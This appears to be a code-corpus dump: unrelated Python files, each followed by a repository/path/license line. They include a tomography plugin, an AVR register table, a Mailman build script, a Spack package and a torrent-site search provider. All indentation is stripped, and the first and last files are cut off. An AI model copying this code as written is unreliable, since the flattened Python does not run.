logging.debug("initialising Scikitimage Filter Back Projection")
logging.debug("Calling super to make sure that all superclasses are " +
" initialised")
super(ScikitimageFilterBackProjection,
self).__init__("ScikitimageFilterBackProjection")
def _shift(self, sinogram, centre_of_rotation):
centre_of_rotation_shift = (sinogram.shape[0]/2) - centre_of_rotation
return ndimage.interpolation.shift(sinogram,
centre_of_rotation_shift)
def reconstruct(self, sinogram, centre_of_rotation,
angles, shape, center):
print sinogram.shape
sinogram = np.swapaxes(sinogram, 0, 1)
sinogram = self._shift(sinogram, centre_of_rotation)
sino = np.nan_to_num(sinogram)
theta = np.linspace(0, 180, sinogram.shape[1])
result = \
transform.iradon(sino, theta=theta,
output_size=(sinogram.shape[0]),
# self.parameters['output_size'],
filter='ramp', # self.parameters['filter'],
interpolation='linear',
# self.parameters['linear'],
circle=False) # self.parameters[False])
return result
def get_citation_inforamtion(self):
cite_info = CitationInfomration()
cite_info.description = \
("The Tomographic reconstruction performed in this processing " +
"chain is derived from this work.")
cite_info.bibtex = \
("@book{avinash2001principles,\n" +
" title={Principles of computerized tomographic imaging},\n" +
" author={Kak, Avinash C. and Slaney, Malcolm},\n" +
" year={2001},\n" +
" publisher={Society for Industrial and Applied Mathematics}\n" +
"}")
cite_info.endnote = \
("%0 Book\n" +
"%T Principles of computerized tomographic imaging\n" +
"%A Kak, Avinash C.\n" +
"%A Slaney, Malcolm\n" +
"%@ 089871494X\n" +
"%D 2001\n" +
"%I Society for Industrial and Applied Mathematics")
cite_info.doi = "http://dx.doi.org/10.1137/1.9780898719277"
return cite_info
| swtp1v07/Savu | savu/plugins/scikitimage_filter_back_projection.py | Python | apache-2.0 | 3,515 | 0 |
# Partname: ATmega644A
# generated automatically, do not edit
MCUREGS = {
'ADCSRB': '&123',
'ADCSRB_ACME': '$40',
'ACSR': '&80',
'ACSR_ACD': '$80',
'ACSR_ACBG': '$40',
'ACSR_ACO': '$20',
'ACSR_ACI': '$10',
'ACSR_ACIE': '$08',
'ACSR_ACIC': '$04',
'ACSR_ACIS': '$03',
'DIDR1': '&127',
'DIDR1_AIN1D': '$02',
'DIDR1_AIN0D': '$01',
'UDR0': '&198',
'UCSR0A': '&192',
'UCSR0A_RXC0': '$80',
'UCSR0A_TXC0': '$40',
'UCSR0A_UDRE0': '$20',
'UCSR0A_FE0': '$10',
'UCSR0A_DOR0': '$08',
'UCSR0A_UPE0': '$04',
'UCSR0A_U2X0': '$02',
'UCSR0A_MPCM0': '$01',
'UCSR0B': '&193',
'UCSR0B_RXCIE0': '$80',
'UCSR0B_TXCIE0': '$40',
'UCSR0B_UDRIE0': '$20',
'UCSR0B_RXEN0': '$10',
'UCSR0B_TXEN0': '$08',
'UCSR0B_UCSZ02': '$04',
'UCSR0B_RXB80': '$02',
'UCSR0B_TXB80': '$01',
'UCSR0C': '&194',
'UCSR0C_UMSEL0': '$C0',
'UCSR0C_UPM0': '$30',
'UCSR0C_USBS0': '$08',
'UCSR0C_UCSZ0': '$06',
'UCSR0C_UCPOL0': '$01',
'UBRR0': '&196',
'PORTA': '&34',
'DDRA': '&33',
'PINA': '&32',
'PORTB': '&37',
'DDRB': '&36',
'PINB': '&35',
'PORTC': '&40',
'DDRC': '&39',
'PINC': '&38',
'PORTD': '&43',
'DDRD': '&42',
'PIND': '&41',
'OCR0B': '&72',
'OCR0A': '&71',
'TCNT0': '&70',
'TCCR0B': '&69',
'TCCR0B_FOC0A': '$80',
'TCCR0B_FOC0B': '$40',
'TCCR0B_WGM02': '$08',
'TCCR0B_CS0': '$07',
'TCCR0A': '&68',
'TCCR0A_COM0A': '$C0',
'TCCR0A_COM0B': '$30',
'TCCR0A_WGM0': '$03',
'TIMSK0': '&110',
'TIMSK0_OCIE0B': '$04',
'TIMSK0_OCIE0A': '$02',
'TIMSK0_TOIE0': '$01',
'TIFR0': '&53',
'TIFR0_OCF0B': '$04',
'TIFR0_OCF0A': '$02',
'TIFR0_TOV0': '$01',
'GTCCR': '&67',
'GTCCR_TSM': '$80',
'GTCCR_PSRSYNC': '$01',
'TIMSK2': '&112',
'TIMSK2_OCIE2B': '$04',
'TIMSK2_OCIE2A': '$02',
'TIMSK2_TOIE2': '$01',
'TIFR2': '&55',
'TIFR2_OCF2B': '$04',
'TIFR2_OCF2A': '$02',
'TIFR2_TOV2': '$01',
'TCCR2A': '&176',
'TCCR2A_COM2A': '$C0',
'TCCR2A_COM2B': '$30',
'TCCR2A_WGM2': '$03',
'TCCR2B': '&177',
'TCCR2B_FOC2A': '$80',
'TCCR2B_FOC2B': '$40',
'TCCR2B_WGM22': '$08',
'TCCR2B_CS2': '$07',
'TCNT2': '&178',
'OCR2B': '&180',
'OCR2A': '&179',
'ASSR': '&182',
'ASSR_EXCLK': '$40',
'ASSR_AS2': '$20',
'ASSR_TCN2UB': '$10',
'ASSR_OCR2AUB': '$08',
'ASSR_OCR2BUB': '$04',
'ASSR_TCR2AUB': '$02',
'ASSR_TCR2BUB': '$01',
'WDTCSR': '&96',
'WDTCSR_WDIF': '$80',
'WDTCSR_WDIE': '$40',
'WDTCSR_WDP': '$27',
'WDTCSR_WDCE': '$10',
'WDTCSR_WDE': '$08',
'OCDR': '&81',
'MCUCR': '&85',
'MCUCR_JTD': '$80',
'MCUSR': '&84',
'MCUSR_JTRF': '$10',
'SPMCSR': '&87',
'SPMCSR_SPMIE': '$80',
'SPMCSR_RWWSB': '$40',
'SPMCSR_SIGRD': '$20',
'SPMCSR_RWWSRE': '$10',
'SPMCSR_BLBSET': '$08',
'SPMCSR_PGWRT': '$04',
'SPMCSR_PGERS': '$02',
'SPMCSR_SPMEN': '$01',
'EICRA': '&105',
'EICRA_ISC2': '$30',
'EICRA_ISC1': '$0C',
'EICRA_ISC0': '$03',
'EIMSK': '&61',
'EIMSK_INT': '$07',
'EIFR': '&60',
'EIFR_INTF': '$07',
'PCMSK3': '&115',
'PCMSK3_PCINT': '$FF',
'PCMSK2': '&109',
'PCMSK2_PCINT': '$FF',
'PCMSK1': '&108',
'PCMSK1_PCINT': '$FF',
'PCMSK0': '&107',
'PCMSK0_PCINT': '$FF',
'PCIFR': '&59',
'PCIFR_PCIF': '$0F',
'PCICR': '&104',
'PCICR_PCIE': '$0F',
'ADMUX': '&124',
'ADMUX_REFS': '$C0',
'ADMUX_ADLAR': '$20',
'ADMUX_MUX': '$1F',
'ADC': '&120',
'ADCSRA': '&122',
'ADCSRA_ADEN': '$80',
'ADCSRA_ADSC': '$40',
'ADCSRA_ADATE': '$20',
'ADCSRA_ADIF': '$10',
'ADCSRA_ADIE': '$08',
'ADCSRA_ADPS': '$07',
'DIDR0': '&126',
'DIDR0_ADC7D': '$80',
'DIDR0_ADC6D': '$40',
'DIDR0_ADC5D': '$20',
'DIDR0_ADC4D': '$10',
'DIDR0_ADC3D': '$08',
'DIDR0_ADC2D': '$04',
'DIDR0_ADC1D': '$02',
'DIDR0_ADC0D': '$01',
'TIMSK1': '&111',
'TIMSK1_ICIE1': '$20',
'TIMSK1_OCIE1B': '$04',
'TIMSK1_OCIE1A': '$02',
'TIMSK1_TOIE1': '$01',
'TIFR1': '&54',
'TIFR1_ICF1': '$20',
'TIFR1_OCF1B': '$04',
'TIFR1_OCF1A': '$02',
'TIFR1_TOV1': '$01',
'TCCR1A': '&128',
'TCCR1A_COM1A': '$C0',
'TCCR1A_COM1B': '$30',
'TCCR1A_WGM1': '$03',
'TCCR1B': '&129',
'TCCR1B_ICNC1': '$80',
'TCCR1B_ICES1': '$40',
'TCCR1B_WGM1': '$18',
'TCCR1B_CS1': '$07',
'TCCR1C': '&130',
'TCCR1C_FOC1A': '$80',
'TCCR1C_FOC1B': '$40',
'TCNT1': '&132',
'OCR1A': '&136',
'OCR1B': '&138',
'ICR1': '&134',
'EEAR': '&65',
'EEDR': '&64',
'EECR': '&63',
'EECR_EEPM': '$30',
'EECR_EERIE': '$08',
'EECR_EEMPE': '$04',
'EECR_EEPE': '$02',
'EECR_EERE': '$01',
'TWAMR': '&189',
'TWAMR_TWAM': '$FE',
'TWBR': '&184',
'TWCR': '&188',
'TWCR_TWINT': '$80',
'TWCR_TWEA': '$40',
'TWCR_TWSTA': '$20',
'TWCR_TWSTO': '$10',
'TWCR_TWWC': '$08',
'TWCR_TWEN': '$04',
'TWCR_TWIE': '$01',
'TWSR': '&185',
'TWSR_TWS': '$F8',
'TWSR_TWPS': '$03',
'TWDR': '&187',
'TWAR': '&186',
'TWAR_TWA': '$FE',
'TWAR_TWGCE': '$01',
'UDR1': '&206',
'UCSR1A': '&200',
'UCSR1A_RXC1': '$80',
'UCSR1A_TXC1': '$40',
'UCSR1A_UDRE1': '$20',
'UCSR1A_FE1': '$10',
'UCSR1A_DOR1': '$08',
'UCSR1A_UPE1': '$04',
'UCSR1A_U2X1': '$02',
'UCSR1A_MPCM1': '$01',
'UCSR1B': '&201',
'UCSR1B_RXCIE1': '$80',
'UCSR1B_TXCIE1': '$40',
'UCSR1B_UDRIE1': '$20',
'UCSR1B_RXEN1': '$10',
'UCSR1B_TXEN1': '$08',
'UCSR1B_UCSZ12': '$04',
'UCSR1B_RXB81': '$02',
'UCSR1B_TXB81': '$01',
'UCSR1C': '&202',
'UCSR1C_UMSEL1': '$C0',
'UCSR1C_UPM1': '$30',
'UCSR1C_USBS1': '$08',
'UCSR1C_UCSZ1': '$06',
'UCSR1C_UCPOL1': '$01',
'UBRR1': '&204',
'SPDR': '&78',
'SPSR': '&77',
'SPSR_SPIF': '$80',
'SPSR_WCOL': '$40',
'SPSR_SPI2X': '$01',
'SPCR': '&76',
'SPCR_SPIE': '$80',
'SPCR_SPE': '$40',
'SPCR_DORD': '$20',
'SPCR_MSTR': '$10',
'SPCR_CPOL': '$08',
'SPCR_CPHA': '$04',
'SPCR_SPR': '$03',
'SREG': '&95',
'SREG_I': '$80',
'SREG_T': '$40',
'SREG_H': '$20',
'SREG_S': '$10',
'SREG_V': '$08',
'SREG_N': '$04',
'SREG_Z': '$02',
'SREG_C': '$01',
'SP': '&93',
'OSCCAL': '&102',
'CLKPR': '&97',
'CLKPR_CLKPCE': '$80',
'CLKPR_CLKPS': '$0F',
'SMCR': '&83',
'SMCR_SM': '$0E',
'SMCR_SE': '$01',
'GPIOR2': '&75',
'GPIOR2_GPIOR': '$FF',
'GPIOR1': '&74',
'GPIOR1_GPIOR': '$FF',
'GPIOR0': '&62',
'GPIOR0_GPIOR07': '$80',
'GPIOR0_GPIOR06': '$40',
'GPIOR0_GPIOR05': '$20',
'GPIOR0_GPIOR04': '$10',
'GPIOR0_GPIOR03': '$08',
'GPIOR0_GPIOR02': '$04',
'GPIOR0_GPIOR01': '$02',
'GPIOR0_GPIOR00': '$01',
'PRR0': '&100',
'PRR0_PRTWI': '$80',
'PRR0_PRTIM2': '$40',
'PRR0_PRTIM0': '$20',
'PRR0_PRUSART': '$12',
'PRR0_PRTIM1': '$08',
'PRR0_PRSPI': '$04',
'PRR0_PRADC': '$01',
'INT0Addr': '2',
'INT1Addr': '4',
'INT2Addr': '6',
'PCINT0Addr': '8',
'PCINT1Addr': '10',
'PCINT2Addr': '12',
'PCINT3Addr': '14',
'WDTAddr': '16',
'TIMER2_COMPAAddr': '18',
'TIMER2_COMPBAddr': '20',
'TIMER2_OVFAddr': '22',
'TIMER1_CAPTAddr': '24',
'TIMER1_COMPAAddr': '26',
'TIMER1_COMPBAddr': '28',
'TIMER1_OVFAddr': '30',
'TIMER0_COMPAAddr': '32',
'TIMER0_COMPBAddr': '34',
'TIMER0_OVFAddr': '36',
'SPI__STCAddr': '38',
'USART0__RXAddr': '40',
'USART0__UDREAddr': '42',
'USART0__TXAddr': '44',
'ANALOG_COMPAddr': '46',
'ADCAddr': '48',
'EE_READYAddr': '50',
'TWIAddr': '52',
'SPM_READYAddr': '54',
'USART1_RXAddr': '56',
'USART1_UDREAddr': '58',
'USART1_TXAddr': '60'
} | hickey/amforth | core/devices/atmega644a/device.py | Python | gpl-2.0 | 7,375 | 0.071458 |
def extractWhatzombiesfearCom(item):
'''
Parser for 'whatzombiesfear.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
| fake-name/ReadableWebProxy | WebMirror/management/rss_parser_funcs/feed_parse_extractWhatzombiesfearCom.py | Python | bsd-3-clause | 551 | 0.034483 |
distributable = FastLmmSet(
phenofile = 'datasets/phenSynthFrom22.23.bin.N30.txt',
alt_snpreader = 'datasets/all_chr.maf0.001.N30',
altset_list = 'datasets/set_input.23_17_11.txt',
covarfile = None,
filenull = None,
autoselect = False,
mindist = 0,
idist=2,
nperm = 10,
test="lrt",
nullfit="qq", #use quantile-quantile fit to estimate params of null distribution
outfile = 'tmp/lrt_one_kernel_mixed_effect_laplace_l2_logistic_qqfit.N30.txt',
forcefullrank=False,
qmax=0.1, #use the top 10% of null distrib test statistics to fit the null distribution
write_lrtperm=True,
datestamp=None,
nullModel={'effect':'mixed', 'link':'logistic',
'approx':'laplace', 'penalty':'l2'},
altModel={'effect':'mixed', 'link':'logistic',
'approx':'laplace', 'penalty':'l2'},
log = logging.CRITICAL,
detailed_table = False
)
| MicrosoftGenomics/FaST-LMM | tests/inputs/buggy/lrt_one_kernel_mixed_effect_laplace_l2_logistic_qqfit.N30.py | Python | apache-2.0 | 956 | 0.041841 |
##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2019 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
import django_filters
from django.forms import TextInput
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from rest_framework import serializers
from base.models.entity_version import EntityVersion
class EntityVersionFilter(django_filters.FilterSet):
acronym = django_filters.CharFilter(
lookup_expr='icontains', label=_("Acronym"),
widget=TextInput(attrs={'style': "text-transform:uppercase"})
)
title = django_filters.CharFilter(lookup_expr='icontains', label=_("Title"), )
class Meta:
model = EntityVersion
fields = ["entity_type"]
class EntityListSerializer(serializers.Serializer):
acronym = serializers.CharField()
title = serializers.CharField()
entity_type = serializers.CharField()
# Display human readable value
entity_type_text = serializers.CharField(source='get_entity_type_display', read_only=True)
organization = serializers.SerializerMethodField()
select_url = serializers.SerializerMethodField()
def get_organization(self, obj):
return str(obj.entity.organization)
def get_select_url(self, obj):
return reverse(
"entity_read",
kwargs={'entity_version_id': obj.id}
)
| uclouvain/osis | base/forms/entity.py | Python | agpl-3.0 | 2,540 | 0.001182 |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for DeleteDocument
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dialogflow
# [START dialogflow_generated_dialogflow_v2_Documents_DeleteDocument_async]
from google.cloud import dialogflow_v2
async def sample_delete_document():
# Create a client
client = dialogflow_v2.DocumentsAsyncClient()
# Initialize request argument(s)
request = dialogflow_v2.DeleteDocumentRequest(
name="name_value",
)
# Make the request
operation = client.delete_document(request=request)
print("Waiting for operation to complete...")
response = await operation.result()
# Handle the response
print(response)
# [END dialogflow_generated_dialogflow_v2_Documents_DeleteDocument_async]
| googleapis/python-dialogflow | samples/generated_samples/dialogflow_generated_dialogflow_v2_documents_delete_document_async.py | Python | apache-2.0 | 1,580 | 0.000633 |
count = 0
total = 0
average = 0
while True:
inputNumber = raw_input('Enter a number : ')
# Edge Cases
if inputNumber == 'done':
break
if len(inputNumber) < 1:
break
# Logical work
try:
number = float(inputNumber)
except:
print 'Invalid Number'
continue
count = count + 1
total = total + number
print 'Count Total\n', count, total
average = total / count
print average
| rahulbohra/Python-Basic | 35_sum_count_avg_by_user_input.py | Python | mit | 454 | 0.002203 |
#! /usr/bin/python
#
# Copyright 2009, 2010 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
import errno
import grp
import os
import pwd
import socket
import subprocess
import sys
import tempfile
from lazr.config import as_username_groupname
from lp.services.config import config
from lp.services.mailman.config import (
configure_prefix,
configure_siteowner,
)
from lp.services.mailman.monkeypatches import monkey_patch
basepath = [part for part in sys.path if part]
def build_mailman():
# Build and install Mailman if it is enabled and not yet built.
if not config.mailman.build:
# There's nothing to do.
return 0
mailman_path = configure_prefix(config.mailman.build_prefix)
mailman_bin = os.path.join(mailman_path, 'bin')
var_dir = os.path.abspath(config.mailman.build_var_dir)
# If we can import the package, we assume Mailman is properly built at
# the least. This does not catch re-installs that might be necessary
# should our copy in sourcecode be updated. Do that manually.
sys.path.append(mailman_path)
try:
import Mailman
except ImportError:
# sys.path_importer_cache is a mapping of elements of sys.path to
# importer objects used to handle them. In Python2.5+ when an element
# of sys.path is found to not exist on disk, a NullImporter is created
# and cached - this causes Python to never bother re-inspecting the
# disk for that path element. We must clear that cache element so that
# our second attempt to import MailMan after building it will actually
# check the disk.
del sys.path_importer_cache[mailman_path]
need_build = need_install = True
else:
need_build = need_install = False
# Also check for Launchpad-specific bits stuck into the source tree by
# monkey_patch(), in case this is half-installed. See
# <https://bugs.launchpad.net/launchpad-registry/+bug/683486>.
try:
from Mailman.Queue import XMLRPCRunner
from Mailman.Handlers import LPModerate
except ImportError:
# Monkey patches not present, redo install and patch steps.
need_install = True
# Make sure the target directories exist and have the correct
# permissions, otherwise configure will complain.
user, group = as_username_groupname(config.mailman.build_user_group)
# Now work backwards to get the uid and gid
try:
uid = pwd.getpwnam(user).pw_uid
except KeyError:
print >> sys.stderr, 'No user found:', user
sys.exit(1)
try:
gid = grp.getgrnam(group).gr_gid
except KeyError:
print >> sys.stderr, 'No group found:', group
sys.exit(1)
# Ensure that the var_dir exists, is owned by the user:group, and has
# the necessary permissions. Set the mode separately after the
# makedirs() call because some platforms ignore mkdir()'s mode (though
# I think Linux does not ignore it -- better safe than sorry).
try:
os.makedirs(var_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
else:
# Just created the var directory, will need to install mailmain bits.
need_install = True
os.chown(var_dir, uid, gid)
os.chmod(var_dir, 02775)
# Skip mailman setup if nothing so far has shown a reinstall needed.
if not need_install:
return 0
mailman_source = os.path.join('sourcecode', 'mailman')
if config.mailman.build_host_name:
build_host_name = config.mailman.build_host_name
else:
build_host_name = socket.getfqdn()
# Build and install the Mailman software. Note that we don't care about
# --with-cgi-gid because we're not going to use that Mailman subsystem.
executable = os.path.abspath('bin/py')
configure_args = (
'./configure',
'--prefix', mailman_path,
'--with-var-prefix=' + var_dir,
'--with-python=' + executable,
'--with-username=' + user,
'--with-groupname=' + group,
'--with-mail-gid=' + group,
'--with-mailhost=' + build_host_name,
'--with-urlhost=' + build_host_name,
)
if need_build:
# Configure.
retcode = subprocess.call(configure_args, cwd=mailman_source)
if retcode:
print >> sys.stderr, 'Could not configure Mailman:'
sys.exit(retcode)
# Make.
retcode = subprocess.call(('make', ), cwd=mailman_source)
if retcode:
print >> sys.stderr, 'Could not make Mailman.'
sys.exit(retcode)
retcode = subprocess.call(('make', 'install'), cwd=mailman_source)
if retcode:
print >> sys.stderr, 'Could not install Mailman.'
sys.exit(retcode)
# Try again to import the package.
try:
import Mailman
except ImportError:
print >> sys.stderr, 'Could not import the Mailman package'
return 1
# Check to see if the site list exists. The output can go to /dev/null
# because we don't really care about it. The site list exists if
# config_list returns a zero exit status, otherwise it doesn't
# (probably). Before we can do this however, we must monkey patch
# Mailman, otherwise mm_cfg.py won't be set up correctly.
monkey_patch(mailman_path, config)
import Mailman.mm_cfg
retcode = subprocess.call(
('./config_list', '-o', '/dev/null',
Mailman.mm_cfg.MAILMAN_SITE_LIST),
cwd=mailman_bin,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if retcode:
addr, password = configure_siteowner(
config.mailman.build_site_list_owner)
# The site list does not yet exist, so create it now.
retcode = subprocess.call(
('./newlist', '--quiet',
'--emailhost=' + build_host_name,
Mailman.mm_cfg.MAILMAN_SITE_LIST,
addr, password),
cwd=mailman_bin)
if retcode:
print >> sys.stderr, 'Could not create site list'
return retcode
retcode = configure_site_list(
mailman_bin, Mailman.mm_cfg.MAILMAN_SITE_LIST)
if retcode:
print >> sys.stderr, 'Could not configure site list'
return retcode
# Create a directory to hold the gzip'd tarballs for the directories of
# deactivated lists.
try:
os.mkdir(os.path.join(Mailman.mm_cfg.VAR_PREFIX, 'backups'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
return 0
def configure_site_list(mailman_bin, site_list_name):
"""Configure the site list.
Currently, the only thing we want to set is to not advertise the
site list.
"""
fd, config_file_name = tempfile.mkstemp()
try:
os.close(fd)
config_file = open(config_file_name, 'w')
try:
print >> config_file, 'advertised = False'
finally:
config_file.close()
return subprocess.call(
('./config_list', '-i', config_file_name, site_list_name),
cwd=mailman_bin)
finally:
os.remove(config_file_name)
def main():
# setting python paths
program = sys.argv[0]
src = 'lib'
here = os.path.dirname(os.path.abspath(program))
srcdir = os.path.join(here, src)
sys.path = [srcdir, here] + basepath
return build_mailman()
if __name__ == '__main__':
return_code = main()
sys.exit(return_code)
| abramhindle/UnnaturalCodeFork | python/testdata/launchpad/buildmailman.py | Python | agpl-3.0 | 7,591 | 0 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RRots(RPackage):
"""Reproducibility-Optimized Test Statistic
Calculates the Reproducibility-Optimized Test Statistic (ROTS) for
differential testing in omics data."""
homepage = "https://bioconductor.org/packages/ROTS"
git = "https://git.bioconductor.org/packages/ROTS.git"
version('1.18.0', commit='1d4e206a8ce68d5a1417ff51c26174ed9d0ba7d2')
version('1.12.0', commit='7e2c96fd8fd36710321498745f24cc6b59ac02f0')
version('1.10.1', commit='1733d3f868cef4d81af6edfc102221d80793937b')
version('1.8.0', commit='02e3c6455bb1afe7c4cc59ad6d4d8bae7b01428b')
version('1.6.0', commit='3567ac1142ba97770b701ee8e5f9e3e6c781bd56')
version('1.4.0', commit='2e656514a4bf5a837ee6e14ce9b28a61dab955e7')
depends_on('r@3.3:', type=('build', 'run'))
depends_on('r-rcpp', type=('build', 'run'))
depends_on('r-biobase', type=('build', 'run'))
| LLNL/spack | var/spack/repos/builtin/packages/r-rots/package.py | Python | lgpl-2.1 | 1,117 | 0.000895 |
# -*- coding: utf-8 -*-
#
# Cherokee-admin
#
# Authors:
# Alvaro Lopez Ortega <alvaro@alobbs.com>
#
# Copyright (C) 2001-2010 Alvaro Lopez Ortega
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public
# License as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
from consts import *
from configured import *
OWS_STATIC = 'http://cherokee-market.com'
OWS_APPS = 'http://www.octality.com/api/v%s/open/market/apps/' %(OWS_API_VERSION)
OWS_APPS_AUTH = 'http://www.octality.com/api/v%s/market/apps/' %(OWS_API_VERSION)
OWS_APPS_INSTALL = 'http://www.octality.com/api/v%s/market/install/' %(OWS_API_VERSION)
OWS_DEBUG = True
URL_MAIN = '/market'
URL_APP = '/market/app'
URL_SEARCH = '/market/search'
URL_SEARCH_APPLY = '/market/search/apply'
URL_CATEGORY = '/market/category'
URL_REVIEW = '/market/review'
| chetan/cherokee | admin/market/ows_consts.py | Python | gpl-2.0 | 1,407 | 0.012082 |
# coding=utf-8
# Author: Mr_Orange <mr_orange@hotmail.it>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
from __future__ import with_statement
import traceback
import re
import datetime
import xmltodict
import sickbeard
from sickbeard.providers import generic
from sickbeard.common import Quality
from sickbeard import logger
from sickbeard import tvcache
from sickbeard import helpers
from sickbeard import db
from sickbeard import classes
from sickbeard.show_name_helpers import allPossibleShowNames, sanitizeSceneName
class KATProvider(generic.TorrentProvider):
def __init__(self):
generic.TorrentProvider.__init__(self, "KickAssTorrents")
self.supportsBacklog = True
self.public = True
self.enabled = False
self.confirmed = True
self.ratio = None
self.minseed = None
self.minleech = None
self.cache = KATCache(self)
self.urls = {
'base_url': 'https://kat.cr/',
'search': 'https://kat.cr/usearch/',
'rss': 'https://kat.cr/tv/',
}
self.url = self.urls['base_url']
self.search_params = {
'q': '',
'field': 'seeders',
'sorder': 'desc',
'rss': 1,
'category': 'tv'
}
def isEnabled(self):
return self.enabled
def imageName(self):
return 'kat.png'
def _get_season_search_strings(self, ep_obj):
search_string = {'Season': []}
for show_name in set(allPossibleShowNames(ep_obj.show)):
ep_string = sanitizeSceneName(show_name) + ' '
if ep_obj.show.air_by_date or ep_obj.show.sports:
ep_string += str(ep_obj.airdate).split('-')[0]
elif ep_obj.show.anime:
ep_string += "%02d" % ep_obj.scene_absolute_number
else:
ep_string = '%s S%02d -S%02dE category:tv' % (sanitizeSceneName(show_name), ep_obj.scene_season, ep_obj.scene_season) #1) showName SXX -SXXE
search_string['Season'].append(ep_string)
ep_string = '%s "Season %d" -Ep* category:tv' % (sanitizeSceneName(show_name), ep_obj.scene_season) # 2) showName "Season X"
search_string['Season'].append(ep_string)
return [search_string]
def _get_episode_search_strings(self, ep_obj, add_string=''):
search_string = {'Episode': []}
for show_name in set(allPossibleShowNames(ep_obj.show)):
ep_string = sanitizeSceneName(show_name) + ' '
if ep_obj.show.air_by_date:
ep_string += str(ep_obj.airdate).replace('-', ' ')
elif ep_obj.show.sports:
ep_string += str(ep_obj.airdate).replace('-', ' ') + '|' + ep_obj.airdate.strftime('%b')
elif ep_obj.show.anime:
ep_string += "%02d" % ep_obj.scene_absolute_number
else:
ep_string += sickbeard.config.naming_ep_type[2] % {'seasonnumber': ep_obj.scene_season,
'episodenumber': ep_obj.scene_episode} + '|' + \
sickbeard.config.naming_ep_type[0] % {'seasonnumber': ep_obj.scene_season,
'episodenumber': ep_obj.scene_episode}
if add_string:
ep_string += ' ' + add_string
search_string['Episode'].append(re.sub(r'\s+', ' ', ep_string.strip()))
return [search_string]
def _get_size(self, item):
#pylint: disable=W0612
title, url, info_hash, seeders, leechers, size, pubdate = item
return size or -1
def _doSearch(self, search_strings, search_mode='eponly', epcount=0, age=0, epObj=None):
results = []
items = {'Season': [], 'Episode': [], 'RSS': []}
for mode in search_strings.keys():
for search_string in search_strings[mode]:
self.search_params.update({'q': search_string, 'field': ('seeders', 'time_add')[mode == 'RSS']})
logger.log(u"Search string: %s" % unicode(self.search_params), logger.DEBUG)
try:
data = self.getURL(self.urls[('search', 'rss')[mode == 'RSS']], params=self.search_params)
if not data:
continue
entries = xmltodict.parse(data)
if not all([entries, 'rss' in entries, 'channel' in entries['rss'], 'item' in entries['rss']['channel']]):
continue
for item in entries['rss']['channel']['item']:
try:
title = item['title']
# Use the torcache link kat provides,
# unless it is not torcache or we are not using blackhole
# because we want to use magnets if connecting direct to client
# so that proxies work.
url = item['enclosure']['@url']
if sickbeard.TORRENT_METHOD != "blackhole" or 'torcache' not in url:
url = item['torrent:magnetURI']
seeders = int(item['torrent:seeds'])
leechers = int(item['torrent:peers'])
verified = bool(int(item['torrent:verified']) or 0)
size = int(item['torrent:contentLength'])
info_hash = item['torrent:infoHash']
#link = item['link']
except (AttributeError, TypeError, KeyError):
continue
# Dont let RSS add items with no seeders either -.-
if not seeders or seeders < self.minseed or leechers < self.minleech:
logger.log(u"Discarding torrent because it doesn't meet the minimum seeders or leechers: {0} (S:{1} L:{2})".format(title, seeders, leechers), logger.DEBUG)
continue
if self.confirmed and not verified:
logger.log(u"KAT Provider found result " + title + " but that doesn't seem like a verified result so I'm ignoring it", logger.DEBUG)
continue
if not title or not url:
continue
try:
pubdate = datetime.datetime.strptime(item['pubDate'], '%a, %d %b %Y %H:%M:%S +0000')
except Exception:
pubdate = datetime.datetime.today()
